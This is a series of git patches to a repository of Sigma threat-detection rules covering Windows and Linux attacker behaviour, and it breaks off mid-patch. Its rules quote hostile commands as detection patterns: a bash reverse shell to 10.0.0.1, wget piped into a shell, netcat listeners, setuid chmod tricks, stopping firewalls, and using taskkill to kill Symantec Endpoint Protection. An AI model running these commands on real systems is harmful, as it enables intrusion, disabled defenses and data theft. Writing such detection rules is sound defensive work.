a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_disable_SEP.yml new file mode 100644 index 000000000..102423988 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_disable_SEP.yml @@ -0,0 +1,25 @@ +title: Disabling SEP +id: 4a6713f6-3331-11ed-a261-0242ac120002 +status: experimental +description: detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. +references: + - internal investigation +author: Ilya Krestinichev +date: 2022/09/13 +tags: + - attack.Impair_Defenses + - attack.t1562 +logsource: + category: process_creation + product: windows +detection: + selection: + ParentCommandLine|contains|all: + - 'taskkill' + - 'ccSvcHst.exe' + condition: selection +fields: + - CommandLine +falsepositives: + - Unknown +level: critical \ No newline at end of file From eb4247fdb45bfd2a90e2768e23a9f8473d81242b Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Wed, 14 Sep 2022 15:03:50 +0200 Subject: [PATCH 022/120] Add missing modified field --- .../proc_creation_win_cmd_redirection_susp_folder.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml index dada69bd7..14fc79e5e 100644 --- a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml @@ -6,6 +6,7 @@ author: Nasreddine Bencherchali references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ date: 2022/07/12 +modified: 2022/09/14 logsource: category: process_creation product: windows From d078d47360c00849778d834ce0f491c836632be5 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Wed, 14 Sep 2022 22:32:35 +0430 Subject: [PATCH 023/120] New Rule: Windows DNS Client Rule --- .../posh_ps_add_dnsclient_rule.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml new file mode 100644 index 000000000..637bf65e2 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -0,0 +1,23 @@ +title: Windows DNS Client Commands +id: 4368354e-1797-463c-bc39-a309effbe8d7 +status: experimental +description: Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query. +references: + - https://twitter.com/NathanMcNulty/status/1569497348841287681 + - https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps +author: Borna Talebi +date: 2021/09/14 +logsource: + product: windows + category: ps_script + definition: Script Block Logging must be enabled +detection: + selection: + ScriptBlockText|contains: Add-DnsClientNrptRule + condition: selection +tags: + - attack.impact + - attack.t1565 +falsepositives: + - Unknown +level: high From 227c2f6bb91f872cc25f33b25f5f14f4d353ce36 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Wed, 14 Sep 2022 23:11:52 +0430 Subject: [PATCH 024/120] Update posh_ps_add_dnsclient_rule.yml --- .../powershell_script/posh_ps_add_dnsclient_rule.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index 637bf65e2..5d589174b 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -13,7 +13,10 @@ logsource: definition: Script Block Logging must be enabled detection: selection: - ScriptBlockText|contains: Add-DnsClientNrptRule + ScriptBlockText|contains|all: + - Add-DnsClientNrptRule + - Namespace + - NameServers condition: selection tags: - attack.impact From 0e7085bee5388b7b27319c80f152fc51ac404379 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Wed, 14 Sep 2022 23:23:58 +0430 Subject: [PATCH 025/120] Update posh_ps_add_dnsclient_rule.yml --- .../powershell_script/posh_ps_add_dnsclient_rule.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index 5d589174b..def0de1c4 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -15,8 +15,8 @@ detection: selection: ScriptBlockText|contains|all: - Add-DnsClientNrptRule - - Namespace - - NameServers + - '-Namespace ' + - '-NameServers ' condition: selection tags: - attack.impact From 2fe25f3c80a1ddb23a53800313176406a3bb32be Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 15 Sep 2022 16:50:34 +0200 Subject: [PATCH 026/120] rule: sharpersist usage --- .../proc_creation_win_hack_sharpersist.yml | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml diff --git a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml new file mode 100644 index 000000000..02c36329a --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml @@ -0,0 +1,42 @@ +title: SharPersist Usage +id: 26488ad0-f9fd-4536-876f-52fea846a2e4 +status: experimental +description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms +author: Florian Roth +references: + - https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit + - https://github.com/mandiant/SharPersist +date: 2022/09/15 +logsource: + category: process_creation + product: windows +tags: + - attack.persistence + - attack.t1053 + - attack.t1060 + - attack.t1050 +detection: + selection1: + Image|endswith: '\SharPersist.exe' + selection2: + Product: 'SharPersist' + selection3: + CommandLine|contains: + - ' -t schtask -c ' + - ' -t startupfolder -c ' + selection4: + CommandLine|contains|all: + - ' -t reg -c ' + - ' -m add' + selection5: + CommandLine|contains|all: + - ' -t service -c ' + - ' -m add' + selection6: + CommandLine|contains|all: + - ' -t schtask -c ' + - ' -m add' + condition: selection +falsepositives: + - Unknown +level: high From b984d52c65189443a40afcead88097c4e41c1438 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Fri, 16 Sep 2022 00:32:47 +0430 Subject: [PATCH 027/120] Fixing conditions --- .../powershell_script/posh_ps_add_dnsclient_rule.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index def0de1c4..1c8d0ab78 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -14,9 +14,9 @@ logsource: detection: selection: ScriptBlockText|contains|all: - - Add-DnsClientNrptRule - - '-Namespace ' - - '-NameServers ' + - 'Add-DnsClientNrptRule' + - '-Namesp' + - '-NameSe' condition: selection tags: - attack.impact From 2af0431efafb04f19e8c9fb1bbeb1128b5c9a81d Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Fri, 16 Sep 2022 00:53:55 +0430 Subject: [PATCH 028/120] Change Title --- .../powershell/powershell_script/posh_ps_add_dnsclient_rule.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index 1c8d0ab78..6acd74a7f 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -1,4 +1,4 @@ -title: Windows DNS Client Commands +title: Powershell Add Name Resolution Policy Table Rule id: 4368354e-1797-463c-bc39-a309effbe8d7 status: experimental description: Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query. From 92b6ba95e62d2d5514b39be94cdd60e9ef0861fd Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 16 Sep 2022 09:12:08 +0200 Subject: [PATCH 029/120] reduce the timeframe to 1min --- .../builtin/smbclient/win_susp_failed_hidden_share_mount.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml index ab736de4d..fd5cdf40b 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml @@ -16,7 +16,7 @@ detection: selection: EventID: 31010 ShareName|endswith: '$' - timeframe: 10m + timeframe: 1m condition: selection | count() > 10 fields: - ShareName From 6d9d08e1dec7bb6e86cdcfde55fbb23822881616 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 16 Sep 2022 09:18:27 +0200 Subject: [PATCH 030/120] Update proc_creation_disable_SEP.yml --- .../proc_creation_disable_SEP.yml | 22 ++++++++++--------- 1 file changed, 12 insertions(+), 10 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_disable_SEP.yml index 102423988..773527fc0 100644 --- a/rules/windows/process_creation/proc_creation_disable_SEP.yml +++ b/rules/windows/process_creation/proc_creation_disable_SEP.yml @@ -1,25 +1,27 @@ -title: Disabling SEP +title: Disabling Symantec Endpoint Protection with Taskkill id: 4a6713f6-3331-11ed-a261-0242ac120002 status: experimental -description: detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. +description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. references: - - internal investigation -author: Ilya Krestinichev + - https://www.exploit-db.com/exploits/37525 + - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection + - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer +author: Ilya Krestinichev, Florian Roth date: 2022/09/13 tags: - - attack.Impair_Defenses - - attack.t1562 + - attack.defense_evasion + - attack.t1562.001 logsource: category: process_creation product: windows detection: selection: - ParentCommandLine|contains|all: + CommandLine|contains|all: - 'taskkill' + - ' /F ' + - ' /IM ' - 'ccSvcHst.exe' condition: selection -fields: - - CommandLine falsepositives: - Unknown -level: critical \ No newline at end of file +level: high From b4376ea580c7bdf74ac864b21a97b7e49d6a9162 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 16 Sep 2022 09:22:21 +0200 Subject: [PATCH 031/120] refactor: CRLF to LF --- .../proc_creation_disable_SEP.yml | 54 +++++++++---------- 1 file changed, 27 insertions(+), 27 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_disable_SEP.yml index 773527fc0..abe183491 100644 --- a/rules/windows/process_creation/proc_creation_disable_SEP.yml +++ b/rules/windows/process_creation/proc_creation_disable_SEP.yml @@ -1,27 +1,27 @@ -title: Disabling Symantec Endpoint Protection with Taskkill -id: 4a6713f6-3331-11ed-a261-0242ac120002 -status: experimental -description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. -references: - - https://www.exploit-db.com/exploits/37525 - - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection - - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer -author: Ilya Krestinichev, Florian Roth -date: 2022/09/13 -tags: - - attack.defense_evasion - - attack.t1562.001 -logsource: - category: process_creation - product: windows -detection: - selection: - CommandLine|contains|all: - - 'taskkill' - - ' /F ' - - ' /IM ' - - 'ccSvcHst.exe' - condition: selection -falsepositives: - - Unknown -level: high +title: Disabling Symantec Endpoint Protection with Taskkill +id: 4a6713f6-3331-11ed-a261-0242ac120002 +status: experimental +description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. +references: + - https://www.exploit-db.com/exploits/37525 + - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection + - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer +author: Ilya Krestinichev, Florian Roth +date: 2022/09/13 +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'taskkill' + - ' /F ' + - ' /IM ' + - 'ccSvcHst.exe' + condition: selection +falsepositives: + - Unknown +level: high From 4fc62dee7c37bf97bb20db6b03e4109e85d1591d Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:22:57 +0200 Subject: [PATCH 032/120] Linux rules update --- .../auditd/lnx_auditd_data_exfil_wget.yml | 28 +++---- .../lnx_auditd_susp_histfile_operations.yml | 44 +++++----- .../linux/builtin/lnx_shell_susp_commands.yml | 84 +++++++++---------- ..._connection_lnx_back_connect_shell_dev.yml | 23 +++-- .../proc_creation_lnx_at_command.yml | 4 +- .../proc_creation_lnx_base64_decode.yml | 20 ++--- .../proc_creation_lnx_base64_shebang_cli.yml | 27 ++++++ ...ation_lnx_bpftrace_unsafe_option_usage.yml | 22 ++--- .../proc_creation_lnx_cat_sudoers.yml | 27 +++--- .../proc_creation_lnx_clear_logs.yml | 3 +- .../proc_creation_lnx_clear_syslog.yml | 6 +- ...proc_creation_lnx_clipboard_collection.yml | 16 ++-- .../proc_creation_lnx_crontab_removal.yml | 21 +++++ .../proc_creation_lnx_crypto_mining.yml | 54 ++++++------ .../proc_creation_lnx_curl_usage.yml | 22 +++++ .../proc_creation_lnx_doas_execution.yml | 2 +- .../proc_creation_lnx_file_deletion.yml | 4 +- .../proc_creation_lnx_local_account.yml | 8 +- .../proc_creation_lnx_local_groups.yml | 7 +- .../proc_creation_lnx_nohup.yml | 18 ++-- .../proc_creation_lnx_python_pty_spawn.yml | 2 +- ...eation_lnx_security_software_discovery.yml | 9 +- ..._creation_lnx_security_tools_disabling.yml | 48 +++++------ ...creation_lnx_services_stop_and_disable.yml | 26 ++++++ ...proc_creation_lnx_susp_curl_fileupload.yml | 38 +++++++++ .../proc_creation_lnx_susp_curl_useragent.yml | 28 +++++++ .../proc_creation_lnx_susp_history_delete.yml | 35 ++++---- .../proc_creation_lnx_susp_history_recon.yml | 36 ++++---- ...roc_creation_lnx_susp_interactive_bash.yml | 31 ++++--- .../proc_creation_lnx_susp_pipe_shell.yml | 23 +++-- ..._creation_lnx_system_network_discovery.yml | 11 ++- ...lnx_triple_cross_rootkit_execve_hijack.yml | 21 +++-- ...ation_lnx_triple_cross_rootkit_install.yml | 30 +++---- ..._creation_lnx_chattr_immutable_removal.yml | 25 ++++++ 34 files changed, 507 insertions(+), 296 deletions(-) create mode 100644 rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_curl_usage.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml create mode 100644 rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml diff --git a/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml b/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml index 70a8dec73..c49ea64da 100644 --- a/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml +++ b/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml @@ -5,21 +5,21 @@ author: 'Pawel Mazur' status: experimental date: 2021/11/18 references: - - https://attack.mitre.org/tactics/TA0010/ - - https://linux.die.net/man/1/wget - - https://gtfobins.github.io/gtfobins/wget/ + - https://attack.mitre.org/tactics/TA0010/ + - https://linux.die.net/man/1/wget + - https://gtfobins.github.io/gtfobins/wget/ logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: wget - a1|startswith: '--post-file=' - condition: selection + selection: + type: EXECVE + a0: wget + a1|startswith: '--post-file=' + condition: selection tags: - - attack.exfiltration - - attack.t1048.003 + - attack.exfiltration + - attack.t1048.003 falsepositives: - - Legitimate usage of wget utility to post a file -level: medium \ No newline at end of file + - Legitimate usage of wget utility to post a file +level: medium diff --git a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml index 2515f99b4..7e50f7619 100644 --- a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml +++ b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml @@ -4,33 +4,33 @@ status: test description: 'Detects commandline operations on shell history files' author: 'Mikhail Larin, oscd.community' references: - - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2020/10/17 modified: 2021/11/27 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: EXECVE - history: - - '.bash_history' - - '.zsh_history' - - '.zhistory' - - '.history' - - '.sh_history' - - 'fish_history' - condition: execve and history + execve: + type: EXECVE + history: + - '.bash_history' + - '.zsh_history' + - '.zhistory' + - '.history' + - '.sh_history' + - 'fish_history' + condition: execve and history fields: - - a0 - - a1 - - a2 - - a3 - - key + - a0 + - a1 + - a2 + - a3 + - key falsepositives: - - Legitimate administrative activity - - Legitimate software, cleaning hist file + - Legitimate administrative activity + - Legitimate software, cleaning hist file level: medium tags: - - attack.credential_access - - attack.t1552.003 + - attack.credential_access + - attack.t1552.003 diff --git a/rules/linux/builtin/lnx_shell_susp_commands.yml b/rules/linux/builtin/lnx_shell_susp_commands.yml index 44a5331c4..e31d748e5 100644 --- a/rules/linux/builtin/lnx_shell_susp_commands.yml +++ b/rules/linux/builtin/lnx_shell_susp_commands.yml @@ -4,56 +4,56 @@ status: test description: Detects suspicious shell commands used in various exploit codes (see references) author: Florian Roth references: - - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html - - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb - - http://pastebin.com/FtygZ1cg - - https://artkond.com/2017/03/23/pivoting-guide/ + - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html + - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb + - http://pastebin.com/FtygZ1cg + - https://artkond.com/2017/03/23/pivoting-guide/ date: 2017/08/21 modified: 2021/11/27 logsource: - product: linux + product: linux detection: - keywords: + keywords: # Generic suspicious commands - - 'wget * - http* | perl' - - 'wget * - http* | sh' - - 'wget * - http* | bash' - - 'python -m SimpleHTTPServer' - - '-m http.server' # Python 3 - - 'import pty; pty.spawn*' - - 'socat exec:*' - - 'socat -O /tmp/*' - - 'socat tcp-connect*' - - '*echo binary >>*' + - 'wget * - http* | perl' + - 'wget * - http* | sh' + - 'wget * - http* | bash' + - 'python -m SimpleHTTPServer' + - '-m http.server' # Python 3 + - 'import pty; pty.spawn*' + - 'socat exec:*' + - 'socat -O /tmp/*' + - 'socat tcp-connect*' + - '*echo binary >>*' # Malware - - '*wget *; chmod +x*' - - '*wget *; chmod 777 *' - - '*cd /tmp || cd /var/run || cd /mnt*' + - '*wget *; chmod +x*' + - '*wget *; chmod 777 *' + - '*cd /tmp || cd /var/run || cd /mnt*' # Apache Struts in-the-wild exploit codes - - '*stop;service iptables stop;*' - - '*stop;SuSEfirewall2 stop;*' - - 'chmod 777 2020*' - - '*>>/etc/rc.local' + - '*stop;service iptables stop;*' + - '*stop;SuSEfirewall2 stop;*' + - 'chmod 777 2020*' + - '*>>/etc/rc.local' # Metasploit framework exploit codes - - '*base64 -d /tmp/*' - - '* | base64 -d *' - - '*/chmod u+s *' - - '*chmod +s /tmp/*' - - '*chmod u+s /tmp/*' - - '* /tmp/haxhax*' - - '* /tmp/ns_sploit*' - - 'nc -l -p *' - - 'cp /bin/ksh *' - - 'cp /bin/sh *' - - '* /tmp/*.b64 *' - - '*/tmp/ysocereal.jar*' - - '*/tmp/x *' - - '*; chmod +x /tmp/*' - - '*;chmod +x /tmp/*' - condition: keywords + - '*base64 -d /tmp/*' + - '* | base64 -d *' + - '*/chmod u+s *' + - '*chmod +s /tmp/*' + - '*chmod u+s /tmp/*' + - '* /tmp/haxhax*' + - '* /tmp/ns_sploit*' + - 'nc -l -p *' + - 'cp /bin/ksh *' + - 'cp /bin/sh *' + - '* /tmp/*.b64 *' + - '*/tmp/ysocereal.jar*' + - '*/tmp/x *' + - '*; chmod +x /tmp/*' + - '*;chmod +x /tmp/*' + condition: keywords falsepositives: - - Unknown + - Unknown level: high tags: - - attack.execution - - attack.t1059.004 + - attack.execution + - attack.t1059.004 diff --git a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml index 611227011..6b542f330 100644 --- a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml +++ b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml @@ -3,21 +3,20 @@ id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871 status: experimental description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') references: - - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md date: 2021/10/16 author: Florian Roth logsource: - product: linux - category: network_connection + product: linux + category: network_connection detection: - selection: - Image|endswith: '/bin/bash' - filter: - DestinationIp: - - '127.0.0.1' - - '0.0.0.0' - condition: selection and not filter + selection: + Image|endswith: '/bin/bash' + filter: + DestinationIp: + - '127.0.0.1' + - '0.0.0.0' + condition: selection and not filter falsepositives: - - Unknown + - Unknown level: critical - diff --git a/rules/linux/process_creation/proc_creation_lnx_at_command.yml b/rules/linux/process_creation/proc_creation_lnx_at_command.yml index 18c74f982..f3fd95576 100644 --- a/rules/linux/process_creation/proc_creation_lnx_at_command.yml +++ b/rules/linux/process_creation/proc_creation_lnx_at_command.yml @@ -13,8 +13,8 @@ logsource: detection: selection: Image|endswith: - - '/at' - - '/atd' + - '/at' + - '/atd' condition: selection falsepositives: - Legitimate administration activities diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml b/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml index acbfecabe..21ed3909f 100644 --- a/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml +++ b/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml @@ -4,20 +4,20 @@ status: test description: Detects usage of base64 utility to decode arbitrary base64-encoded text author: Daniil Yugoslavskiy, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md date: 2020/10/19 modified: 2021/11/27 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/base64' - CommandLine|contains: '-d' - condition: selection + selection: + Image|endswith: '/base64' + CommandLine|contains: '-d' + condition: selection falsepositives: - - Legitimate activities + - Legitimate activities level: low tags: - - attack.defense_evasion - - attack.t1027 + - attack.defense_evasion + - attack.t1027 diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml new file mode 100644 index 000000000..73ac17665 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml @@ -0,0 +1,27 @@ +title: Linux Base64 Encoded Shebang In CLI +id: fe2f9663-41cb-47e2-b954-8a228f3b9dff +status: experimental +description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded +author: Nasreddine Bencherchali +date: 2022/09/15 +references: + - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html + - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS +logsource: + product: linux + category: process_creation +detection: + selection: + - CommandLine|contains: + - "IyEvYmluL2Jhc2" #!/bin/bash" + - "IyEvYmluL2Rhc2" #!/bin/dash" + - "IyEvYmluL3pza" #!/bin/zsh" + - "IyEvYmluL2Zpc2" #!/bin/fish + - "IyEvYmluL3No" # !/bin/sh" + condition: selection +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.defense_evasion + - attack.t1140 diff --git a/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml b/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml index a0c4b717f..42cdad2b6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml +++ b/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml @@ -4,20 +4,20 @@ status: experimental description: Detects the usage of the unsafe bpftrace option author: Andreas Hunkeler (@Karneades) tags: - - attack.execution - - attack.t1059.004 + - attack.execution + - attack.t1059.004 references: - - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ - - https://bpftrace.org/ + - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ + - https://bpftrace.org/ date: 2022/02/11 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection1: - Image|endswith: 'bpftrace' - CommandLine|contains: '--unsafe' - condition: selection1 + selection: + Image|endswith: 'bpftrace' + CommandLine|contains: '--unsafe' + condition: selection falsepositives: - - Legitimate usage of the unsafe option + - Legitimate usage of the unsafe option level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml index e9c822de9..5f7b9d5e7 100644 --- a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml +++ b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml @@ -4,21 +4,24 @@ status: test description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: - - '/cat' - - 'grep' - CommandLine|contains: ' /etc/sudoers' - condition: selection + selection: + Image|endswith: + - '/cat' + - 'grep' + - '/head' + - '/tail' + CommandLine|contains: ' /etc/sudoers' + condition: selection falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium tags: - - attack.reconnaissance - - attack.t1592.004 + - attack.reconnaissance + - attack.t1592.004 diff --git a/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml b/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml index a3252ac28..115b209a0 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml @@ -4,7 +4,7 @@ status: stable description: Detects attempts to clear 